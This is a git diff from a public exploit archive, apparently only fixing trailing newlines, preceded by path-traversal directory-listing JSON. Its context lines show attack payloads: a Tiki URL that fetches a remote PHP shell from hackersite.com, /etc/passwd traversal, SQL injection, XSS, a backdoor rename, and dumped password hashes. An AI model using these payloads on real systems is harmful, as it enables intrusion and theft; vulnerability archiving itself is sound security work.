[{"name":"libaudit.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/libaudit.conf","class":"undefined"},{"name":"qemu-ifup","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/qemu-ifup","class":"undefined"},{"name":"rsyslog.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/rsyslog.conf","class":"undefined"},{"name":"smi.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/smi.conf","class":"undefined"},{"name":"inputrc","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/inputrc","class":"undefined"},{"name":"shadow-","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/shadow-","class":"undefined"},{"name":"rpc","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/rpc","class":"undefined"},{"name":"host.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/host.conf","class":"undefined"},{"name":"issue","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/issue","class":"undefined"},{"name":"ltrace.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/ltrace.conf","class":"undefined"},{"name":"subuid","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/subuid","class":"undefined"}, -...snip... +...snip... \ No newline at end of file diff --git a/platforms/php/webapps/39957.py b/platforms/php/webapps/39957.py index c1d969070..83a1f270b 100755 --- a/platforms/php/webapps/39957.py +++ b/platforms/php/webapps/39957.py @@ -114,4 +114,4 @@ if __name__ == '__main__': print "[*]\toperator password reset" admin = False - exploit(args.url, admin, args.lastactive, args.passwd) + exploit(args.url, admin, args.lastactive, args.passwd) \ No newline at end of file diff --git a/platforms/php/webapps/39963.txt b/platforms/php/webapps/39963.txt index 05ee4f0a1..dddfdaa58 100755 --- a/platforms/php/webapps/39963.txt +++ b/platforms/php/webapps/39963.txt @@ -24,4 +24,4 @@ any checks. http://host/fileman/php/movefile.php?f=/Upload/backdoor.jpg&n=/Upload/backdoor.php -The renamed file will now be accessible at http://host/Upload/backdoor.php +The renamed file will now be accessible at http://host/Upload/backdoor.php \ No newline at end of file diff --git a/platforms/php/webapps/39964.html b/platforms/php/webapps/39964.html index 243f1cdee..44dee58a9 100755 --- a/platforms/php/webapps/39964.html +++ b/platforms/php/webapps/39964.html @@ -42,6 +42,4 @@ Request Intercepted - - +--> \ No newline at end of file diff --git a/platforms/php/webapps/39965.txt b/platforms/php/webapps/39965.txt index ddc34f156..3551c8b55 100755 --- a/platforms/php/webapps/39965.txt +++ b/platforms/php/webapps/39965.txt @@ -23,4 +23,4 @@ http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22index6.php%22,% Execute a php shellcode: -http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://hackersite.com/r57.txt%22%29%29;fclose%28$z%29;%27 +http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://hackersite.com/r57.txt%22%29%29;fclose%28$z%29;%27 \ No newline at end of file diff --git a/platforms/php/webapps/3997.txt b/platforms/php/webapps/3997.txt index a72754ece..b09e0640f 100755 --- a/platforms/php/webapps/3997.txt +++ b/platforms/php/webapps/3997.txt @@ -14,4 +14,4 @@ #Contact : Miro_Tiger[at]hotmail[dot]com -# milw0rm.com [2007-05-27] +# milw0rm.com [2007-05-27] \ No newline at end of file diff --git a/platforms/php/webapps/39970.txt b/platforms/php/webapps/39970.txt index 4df2870bf..66e867e6b 100755 --- a/platforms/php/webapps/39970.txt +++ b/platforms/php/webapps/39970.txt @@ -60,4 +60,4 @@ Click 'Preview Script' - + \ No newline at end of file diff --git a/platforms/php/webapps/39976.txt b/platforms/php/webapps/39976.txt index 44705152d..61358a022 100755 --- a/platforms/php/webapps/39976.txt +++ b/platforms/php/webapps/39976.txt @@ -224,4 +224,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/39978.php b/platforms/php/webapps/39978.php index 01939c06d..439350e20 100755 --- a/platforms/php/webapps/39978.php +++ b/platforms/php/webapps/39978.php @@ -180,4 +180,4 @@ Examples: EOD; echo $help."\n\n"; die(); -} +} \ No newline at end of file diff --git a/platforms/php/webapps/3998.php b/platforms/php/webapps/3998.php index 4857ca8cc..be81eccf6 100755 --- a/platforms/php/webapps/3998.php +++ b/platforms/php/webapps/3998.php @@ -244,4 +244,4 @@ echo $temp[1];} else{echo "exploit dont work... check phpinfo()...\n";} ?> -# milw0rm.com [2007-05-27] +# milw0rm.com [2007-05-27] \ No newline at end of file diff --git a/platforms/php/webapps/39981.html b/platforms/php/webapps/39981.html index b3915d7ad..73a839869 100755 --- a/platforms/php/webapps/39981.html +++ b/platforms/php/webapps/39981.html @@ -18,5 +18,4 @@ - - + \ No newline at end of file diff --git a/platforms/php/webapps/39982.rb b/platforms/php/webapps/39982.rb index 511e5112c..b02478df3 100755 --- a/platforms/php/webapps/39982.rb +++ b/platforms/php/webapps/39982.rb @@ -66,5 +66,4 @@ mode=save&file=1.php&scrollvalue=&contents=&group=vvv_h [Response] Uloaded file http://127.0.0.1/vul_test/airia/data/vvv_html/1.html -=end - +=end \ No newline at end of file diff --git a/platforms/php/webapps/39983.txt b/platforms/php/webapps/39983.txt index 5f9d0fa62..5c8ad56ca 100755 --- a/platforms/php/webapps/39983.txt +++ b/platforms/php/webapps/39983.txt @@ -142,4 +142,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/3999.txt b/platforms/php/webapps/3999.txt index 965fd1078..1e23b53a1 100755 --- a/platforms/php/webapps/3999.txt +++ b/platforms/php/webapps/3999.txt @@ -3,4 +3,4 @@ # Exploit : [path]/skins/common.css.php?skin=../../../../../../etc/passwd%00 # Discovered by: Mahmood_ali -# milw0rm.com [2007-05-28] +# milw0rm.com [2007-05-28] \ No newline at end of file diff --git a/platforms/php/webapps/39998.txt b/platforms/php/webapps/39998.txt index 20892eb7f..b03c34740 100755 --- a/platforms/php/webapps/39998.txt +++ b/platforms/php/webapps/39998.txt @@ -16,4 +16,4 @@ Within 'Companies & Accounts > Accounts' select your prefered user, and then in -Either refresh the current page, or navigate back to 'Accounts' +Either refresh the current page, or navigate back to 'Accounts' \ No newline at end of file diff --git a/platforms/php/webapps/4000.txt b/platforms/php/webapps/4000.txt index 759300a3c..987fba8b7 100755 --- a/platforms/php/webapps/4000.txt +++ b/platforms/php/webapps/4000.txt @@ -27,4 +27,4 @@ Exploit :[Path]/newsletter/newsletter.php?waroot=shell ============================================================== -# milw0rm.com [2007-05-28] +# milw0rm.com [2007-05-28] \ No newline at end of file diff --git a/platforms/php/webapps/40006.txt b/platforms/php/webapps/40006.txt index 25ed96a7f..1691ab7a6 100755 --- a/platforms/php/webapps/40006.txt +++ b/platforms/php/webapps/40006.txt @@ -9,5 +9,4 @@ Exploit : http://site/show_page.php?page=../[FilePath]%00 Example : -http://site/show_page.php?page=../configure.php%00 - +http://site/show_page.php?page=../configure.php%00 \ No newline at end of file diff --git a/platforms/php/webapps/40009.txt b/platforms/php/webapps/40009.txt index 785565277..9b52bce72 100755 --- a/platforms/php/webapps/40009.txt +++ b/platforms/php/webapps/40009.txt @@ -54,4 +54,4 @@ Content-Type: text/plain;charset=UTF-8 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin -bin:x:2:2:bin:/bin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin \ No newline at end of file diff --git a/platforms/php/webapps/40011.txt b/platforms/php/webapps/40011.txt index 231fe950d..a97726e6f 100755 --- a/platforms/php/webapps/40011.txt +++ b/platforms/php/webapps/40011.txt @@ -20,4 +20,4 @@ jQuery21107685743998649676_1466662516225([{"folders":[{"name":"backups","folderu ,{"name":"opt","folderuri":"Li4vLi4vLi4vLi4vb3B0","folderuri_nobase":"../../../../opt","size":"0.0 KB","date":"26 August 2015"},{"name":"run","folderuri":"Li4vLi4vLi4vLi4vcnVu","folderuri_nobase":"../../../../run","size":"0.0 KB","date":"23 June 2016"},{"name":"spool","folderuri":"Li4vLi4vLi4vLi4vc3Bvb2w=","folderuri_nobase":"../../../../spool","size":"0.0 KB","date":"26 August 2015"},{"name":"tmp","folderuri":"Li4vLi4vLi4vLi4vdG1w","folderuri_nobase":"../../../../tmp","size":"0.0 KB","date":"23 June 2016"},{"name":"www","folderuri":"Li4vLi4vLi4vLi4vd3d3","folderuri_nobase":"../../../../www","size":"0.0 KB","date":"22 January ### Vulnerability2 - Reflected XSS -http://127.0.0.1/vul_test/FinderView/api.php?callback=jQuery211027821724654516156_1466662510279}}1c027%3Cscript%3Ealert%281%29%3C%2fscript%3Ecf2ea&type=get&mode=0&_=1466662510280 +http://127.0.0.1/vul_test/FinderView/api.php?callback=jQuery211027821724654516156_1466662510279}}1c027%3Cscript%3Ealert%281%29%3C%2fscript%3Ecf2ea&type=get&mode=0&_=1466662510280 \ No newline at end of file diff --git a/platforms/php/webapps/40012.txt b/platforms/php/webapps/40012.txt index 119f00ad1..80defd5cb 100755 --- a/platforms/php/webapps/40012.txt +++ b/platforms/php/webapps/40012.txt @@ -74,5 +74,4 @@ time-line 2015-08-08: vulnerability found 2016-06-21: Reported to vendor (No response) 2016-06-24: Public disclousure -=================================== - +=================================== \ No newline at end of file diff --git a/platforms/php/webapps/40015.txt b/platforms/php/webapps/40015.txt index 858b8bced..154b668b6 100755 --- a/platforms/php/webapps/40015.txt +++ b/platforms/php/webapps/40015.txt @@ -28,4 +28,4 @@ keywords the javascript code will be executed. 3. Solution: -The new version of codoforum will be released this week. +The new version of codoforum will be released this week. \ No newline at end of file diff --git a/platforms/php/webapps/40019.txt b/platforms/php/webapps/40019.txt index 340ed6ad2..ea8425370 100755 --- a/platforms/php/webapps/40019.txt +++ b/platforms/php/webapps/40019.txt @@ -84,5 +84,4 @@ Search: "> http://localhost/[path]/cat1.php?id2=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%22%3E%3Cscript%3Ealert%28%27n4tural%27%29%3B%3C%2Fscript%3E&id=0&sucheWo=&umkreis=0 -###################### - +###################### \ No newline at end of file diff --git a/platforms/php/webapps/40024.txt b/platforms/php/webapps/40024.txt index 649f33493..a86fdf41d 100755 --- a/platforms/php/webapps/40024.txt +++ b/platforms/php/webapps/40024.txt @@ -178,4 +178,4 @@ https://github.com/bigtreecms/BigTree-CMS/pull/256 -- Sr. Information Security Engineer -https://www.mehmetince.net +https://www.mehmetince.net \ No newline at end of file diff --git a/platforms/php/webapps/4003.sh b/platforms/php/webapps/4003.sh index 458a82395..3c17832e9 100755 --- a/platforms/php/webapps/4003.sh +++ b/platforms/php/webapps/4003.sh @@ -50,4 +50,4 @@ cat $host.txt exit 0 -# milw0rm.com [2007-05-28] +# milw0rm.com [2007-05-28] \ No newline at end of file diff --git a/platforms/php/webapps/4004.php b/platforms/php/webapps/4004.php index 3bdebc112..acd22df36 100755 --- a/platforms/php/webapps/4004.php +++ b/platforms/php/webapps/4004.php @@ -191,4 +191,4 @@ if (strstr($html,"666999")) # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-05-29] +# milw0rm.com [2007-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/40041.txt b/platforms/php/webapps/40041.txt index 848d17473..b6d6c5f14 100755 --- a/platforms/php/webapps/40041.txt +++ b/platforms/php/webapps/40041.txt @@ -184,4 +184,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/40046.txt b/platforms/php/webapps/40046.txt index f8d693521..5efb64873 100755 --- a/platforms/php/webapps/40046.txt +++ b/platforms/php/webapps/40046.txt @@ -41,5 +41,4 @@ Content-Type: application/x-www-form-urlencoded Content-Length: 9 email=%27%20[SQL PAYLOAD];# --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \ No newline at end of file diff --git a/platforms/php/webapps/4005.txt b/platforms/php/webapps/4005.txt index bac7cb38e..413b694ff 100755 --- a/platforms/php/webapps/4005.txt +++ b/platforms/php/webapps/4005.txt @@ -12,4 +12,4 @@ #Miro_Tiger[at]Hotmail.com -# milw0rm.com [2007-05-29] +# milw0rm.com [2007-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/40051.txt b/platforms/php/webapps/40051.txt index 5d19192b9..a81abb759 100755 --- a/platforms/php/webapps/40051.txt +++ b/platforms/php/webapps/40051.txt @@ -96,4 +96,4 @@ postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT( # # In order to exploit this vulnerability, the url should be like the following example: # -# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125 +# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125 \ No newline at end of file diff --git a/platforms/php/webapps/40057.txt b/platforms/php/webapps/40057.txt index 406c391be..b8a7b5760 100755 --- a/platforms/php/webapps/40057.txt +++ b/platforms/php/webapps/40057.txt @@ -266,4 +266,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -HYP3RLINX +HYP3RLINX \ No newline at end of file diff --git a/platforms/php/webapps/4006.php b/platforms/php/webapps/4006.php index 0776ceec3..482f99a01 100755 --- a/platforms/php/webapps/4006.php +++ b/platforms/php/webapps/4006.php @@ -225,4 +225,4 @@ if($exploit==1){ } ?> -# milw0rm.com [2007-05-29] +# milw0rm.com [2007-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/40068.txt b/platforms/php/webapps/40068.txt index d0304cecf..bcfc4cdb6 100755 --- a/platforms/php/webapps/40068.txt +++ b/platforms/php/webapps/40068.txt @@ -33,4 +33,4 @@ Local File Inclusion example: http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 Cross Site Scripting example: -http://server/index.php?vyhl='>&lang=cze +http://server/index.php?vyhl='>&lang=cze \ No newline at end of file diff --git a/platforms/php/webapps/40076.php b/platforms/php/webapps/40076.php index d0685f44b..c5ccfea60 100755 --- a/platforms/php/webapps/40076.php +++ b/platforms/php/webapps/40076.php @@ -32,4 +32,4 @@ fclose($socket); $e = explode('Content-Type: text/html',$contents); print $e[1]; } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/40078.txt b/platforms/php/webapps/40078.txt index 09485ff63..33116d031 100755 --- a/platforms/php/webapps/40078.txt +++ b/platforms/php/webapps/40078.txt @@ -51,5 +51,4 @@ Parameter: id (GET) Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY --- -###################### - +###################### \ No newline at end of file diff --git a/platforms/php/webapps/40080.txt b/platforms/php/webapps/40080.txt index 5a311027d..1887999f7 100755 --- a/platforms/php/webapps/40080.txt +++ b/platforms/php/webapps/40080.txt @@ -54,4 +54,4 @@ Timeline: 01-06-2016: Discovered 01-06-2016: Vendor notified - 08-06-2016: Version 15.1 released, issue resolved + 08-06-2016: Version 15.1 released, issue resolved \ No newline at end of file diff --git a/platforms/php/webapps/40082.txt b/platforms/php/webapps/40082.txt index 8d2d660df..621efbd18 100755 --- a/platforms/php/webapps/40082.txt +++ b/platforms/php/webapps/40082.txt @@ -72,4 +72,4 @@ Date: Tue, 05 Jul 2016 19:31:19 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 0 Connection: close -Content-Type: text/html; charset=UTF-8 +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/platforms/php/webapps/40092.txt b/platforms/php/webapps/40092.txt index ab9132e0a..d9f477625 100755 --- a/platforms/php/webapps/40092.txt +++ b/platforms/php/webapps/40092.txt @@ -28,4 +28,4 @@ # Title : MySQL >= 5.0.12 AND time-based blind # Payload : name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test # -#### +#### \ No newline at end of file diff --git a/platforms/php/webapps/40093.txt b/platforms/php/webapps/40093.txt index 3a3a5d062..0ed11fc4a 100755 --- a/platforms/php/webapps/40093.txt +++ b/platforms/php/webapps/40093.txt @@ -24,4 +24,4 @@ # Title : MySQL >= 5.0.12 AND time-based blind # Payload : ame=Test&age=24’ AND SLEEP(5) AND 'dQNv'='dQNv&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test # -#### +#### \ No newline at end of file diff --git a/platforms/php/webapps/40126.txt b/platforms/php/webapps/40126.txt index 0629a68c8..a8ddf0490 100755 --- a/platforms/php/webapps/40126.txt +++ b/platforms/php/webapps/40126.txt @@ -10,4 +10,4 @@ http://site/admin/user.txt Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1| Username = Admin -Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5] +Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5] \ No newline at end of file diff --git a/platforms/php/webapps/40127.txt b/platforms/php/webapps/40127.txt index cb131d761..d5ade2cb9 100755 --- a/platforms/php/webapps/40127.txt +++ b/platforms/php/webapps/40127.txt @@ -13,4 +13,4 @@ Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5] Test : Exploit : http://www.newsp.eu/demo/user.txt Login Url : http://www.newsp.eu/demo/login.php -Password : demo +Password : demo \ No newline at end of file diff --git a/platforms/php/webapps/40137.html b/platforms/php/webapps/40137.html index 0423f74b4..364c2b3be 100755 --- a/platforms/php/webapps/40137.html +++ b/platforms/php/webapps/40137.html @@ -113,4 +113,4 @@ Proof of concept - + \ No newline at end of file diff --git a/platforms/php/webapps/40150.txt b/platforms/php/webapps/40150.txt index 037cdb8a3..635545bd7 100755 --- a/platforms/php/webapps/40150.txt +++ b/platforms/php/webapps/40150.txt @@ -31,5 +31,4 @@ http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT% 5. SOLUTION ======================================== -Upgrade to the latest version v3.4 build 19 - +Upgrade to the latest version v3.4 build 19 \ No newline at end of file diff --git a/platforms/php/webapps/40154.txt b/platforms/php/webapps/40154.txt index b9b9c5d13..108b9ba02 100755 --- a/platforms/php/webapps/40154.txt +++ b/platforms/php/webapps/40154.txt @@ -244,4 +244,4 @@ VIII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. -I accept no responsibility for any damage caused by the use or misuse of this advisory. +I accept no responsibility for any damage caused by the use or misuse of this advisory. \ No newline at end of file diff --git a/platforms/php/webapps/40163.txt b/platforms/php/webapps/40163.txt index 945e56ae7..c143f3669 100755 --- a/platforms/php/webapps/40163.txt +++ b/platforms/php/webapps/40163.txt @@ -61,5 +61,4 @@ Attacks can include gathering sensitive information, .bash_history, .rhosts, /et Proof Of Concept ================ -PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd - +PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd \ No newline at end of file diff --git a/platforms/php/webapps/40168.txt b/platforms/php/webapps/40168.txt index c93975b3f..3db9accb4 100755 --- a/platforms/php/webapps/40168.txt +++ b/platforms/php/webapps/40168.txt @@ -62,4 +62,4 @@ CSRF PoC Code - + \ No newline at end of file diff --git a/platforms/php/webapps/40185.py b/platforms/php/webapps/40185.py index 2b4f0244c..58199b6ca 100755 --- a/platforms/php/webapps/40185.py +++ b/platforms/php/webapps/40185.py @@ -116,4 +116,4 @@ if __name__ == '__main__': "Remember that servers with PHP version greater than 5.4.6" " is not exploitable, because of warning about null byte in regexp" ) - sys.exit(1) + sys.exit(1) \ No newline at end of file diff --git a/platforms/php/webapps/4019.php b/platforms/php/webapps/4019.php index 8300c4c33..fbfd56458 100755 --- a/platforms/php/webapps/4019.php +++ b/platforms/php/webapps/4019.php @@ -314,4 +314,4 @@ footer(); ?> -# milw0rm.com [2007-06-01] +# milw0rm.com [2007-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/40190.txt b/platforms/php/webapps/40190.txt index 1cb90905b..fbc677e9e 100755 --- a/platforms/php/webapps/40190.txt +++ b/platforms/php/webapps/40190.txt @@ -89,4 +89,4 @@ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 361 Connection: close -action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=&email=Mail&msg= +action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=&email=Mail&msg= \ No newline at end of file diff --git a/platforms/php/webapps/40193.txt b/platforms/php/webapps/40193.txt index c93975b3f..3db9accb4 100755 --- a/platforms/php/webapps/40193.txt +++ b/platforms/php/webapps/40193.txt @@ -62,4 +62,4 @@ CSRF PoC Code - + \ No newline at end of file diff --git a/platforms/php/webapps/4020.php b/platforms/php/webapps/4020.php index cddd77a34..9282251cb 100755 --- a/platforms/php/webapps/4020.php +++ b/platforms/php/webapps/4020.php @@ -170,4 +170,4 @@ $uname Hash is: $password"; # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-06-01] +# milw0rm.com [2007-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/40202.txt b/platforms/php/webapps/40202.txt index b02506a8c..a7cd28bc2 100755 --- a/platforms/php/webapps/40202.txt +++ b/platforms/php/webapps/40202.txt @@ -199,6 +199,4 @@ authors or managers. To record, list, modify, use or edit our material contact ( -- VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com - - +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/40204.txt b/platforms/php/webapps/40204.txt index 517a00f8f..9ec0b2ee8 100755 --- a/platforms/php/webapps/40204.txt +++ b/platforms/php/webapps/40204.txt @@ -16,4 +16,4 @@ web root folder. ### Exploit ### -http://site/browse.php?p=source&file=/etc/passwd +http://site/browse.php?p=source&file=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/40206.txt b/platforms/php/webapps/40206.txt index 26637a8d2..e1a0d79c1 100755 --- a/platforms/php/webapps/40206.txt +++ b/platforms/php/webapps/40206.txt @@ -47,4 +47,4 @@ Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8,nl;q=0.6 x-forwarded-for: 1.1.1.5 Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108)) -Connection: close +Connection: close \ No newline at end of file diff --git a/platforms/php/webapps/40210.html b/platforms/php/webapps/40210.html index f5c8d28f0..502fa6d06 100755 --- a/platforms/php/webapps/40210.html +++ b/platforms/php/webapps/40210.html @@ -63,4 +63,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php - + \ No newline at end of file diff --git a/platforms/php/webapps/40211.txt b/platforms/php/webapps/40211.txt index c22e0c497..8ca1be320 100755 --- a/platforms/php/webapps/40211.txt +++ b/platforms/php/webapps/40211.txt @@ -151,4 +151,4 @@ foreach(array_reverse($matches[0]) as $match){ } */ -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/40212.txt b/platforms/php/webapps/40212.txt index 0d6de9fcb..4c688587f 100755 --- a/platforms/php/webapps/40212.txt +++ b/platforms/php/webapps/40212.txt @@ -124,4 +124,4 @@ Sample session from commix: Shell > whoami root Shell > ls -Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml +Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml \ No newline at end of file diff --git a/platforms/php/webapps/40214.txt b/platforms/php/webapps/40214.txt index b3a24a9d8..1c0201a1d 100755 --- a/platforms/php/webapps/40214.txt +++ b/platforms/php/webapps/40214.txt @@ -63,5 +63,4 @@ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Connection: close -filename=He_molested_murdered_and_mutilated_her.mp4 - +filename=He_molested_murdered_and_mutilated_her.mp4 \ No newline at end of file diff --git a/platforms/php/webapps/40215.txt b/platforms/php/webapps/40215.txt index cec5886ea..d3318f416 100755 --- a/platforms/php/webapps/40215.txt +++ b/platforms/php/webapps/40215.txt @@ -392,4 +392,4 @@ vcsa:!!:14564:::::: sshd:!!:14564:::::: guest::14564:0:99999:7::: bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7::: --sh-3.2$ +-sh-3.2$ \ No newline at end of file diff --git a/platforms/php/webapps/40218.txt b/platforms/php/webapps/40218.txt index a48586fcf..0575baabd 100755 --- a/platforms/php/webapps/40218.txt +++ b/platforms/php/webapps/40218.txt @@ -171,6 +171,4 @@ authors or managers. To record, list, modify, use or edit our material contact ( -- VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com - - +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/4022.htm b/platforms/php/webapps/4022.htm index 90b72afcc..54b163ecb 100755 --- a/platforms/php/webapps/4022.htm +++ b/platforms/php/webapps/4022.htm @@ -80,4 +80,4 @@ color="#FFFFFF">TrYaG-Team

-# milw0rm.com [2007-06-01] +# milw0rm.com [2007-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/40227.txt b/platforms/php/webapps/40227.txt index 5c352993a..0f9e7aea8 100755 --- a/platforms/php/webapps/40227.txt +++ b/platforms/php/webapps/40227.txt @@ -52,4 +52,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5356.php -- -http://192.168.40.1/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd +http://192.168.40.1/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/40237.txt b/platforms/php/webapps/40237.txt index a30d222e8..d314401af 100755 --- a/platforms/php/webapps/40237.txt +++ b/platforms/php/webapps/40237.txt @@ -45,5 +45,4 @@ Disclosure Timeline: 7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public 7/22/2016 - Zabbix released patch for vulnerability 8/3/2016 - CVE details submitted -8/11/2016 - Vulnerability details disclosed - +8/11/2016 - Vulnerability details disclosed \ No newline at end of file diff --git a/platforms/php/webapps/40247.txt b/platforms/php/webapps/40247.txt index ab6111234..04162fa73 100755 --- a/platforms/php/webapps/40247.txt +++ b/platforms/php/webapps/40247.txt @@ -95,4 +95,4 @@ is given to the author. The author is not responsible for any misuse of the info for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -HYP3RLINX +HYP3RLINX \ No newline at end of file diff --git a/platforms/php/webapps/40248.txt b/platforms/php/webapps/40248.txt index 879541cec..30f46b872 100755 --- a/platforms/php/webapps/40248.txt +++ b/platforms/php/webapps/40248.txt @@ -138,4 +138,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -HYP3RLINX +HYP3RLINX \ No newline at end of file diff --git a/platforms/php/webapps/4025.php b/platforms/php/webapps/4025.php index 422689c5d..b518c037d 100755 --- a/platforms/php/webapps/4025.php +++ b/platforms/php/webapps/4025.php @@ -371,4 +371,4 @@ echo "Cant find evil file :/ maybe this version script is too old but is not echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam "; ?> -# milw0rm.com [2007-06-02] +# milw0rm.com [2007-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/4026.php b/platforms/php/webapps/4026.php index c103b3e4c..0d68b663b 100755 --- a/platforms/php/webapps/4026.php +++ b/platforms/php/webapps/4026.php @@ -200,4 +200,4 @@ if($pass==""){echo "exploit failed, check prefix !!!!!!!!!! (index.php?name=PNph echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";} ?> -# milw0rm.com [2007-06-03] +# milw0rm.com [2007-06-03] \ No newline 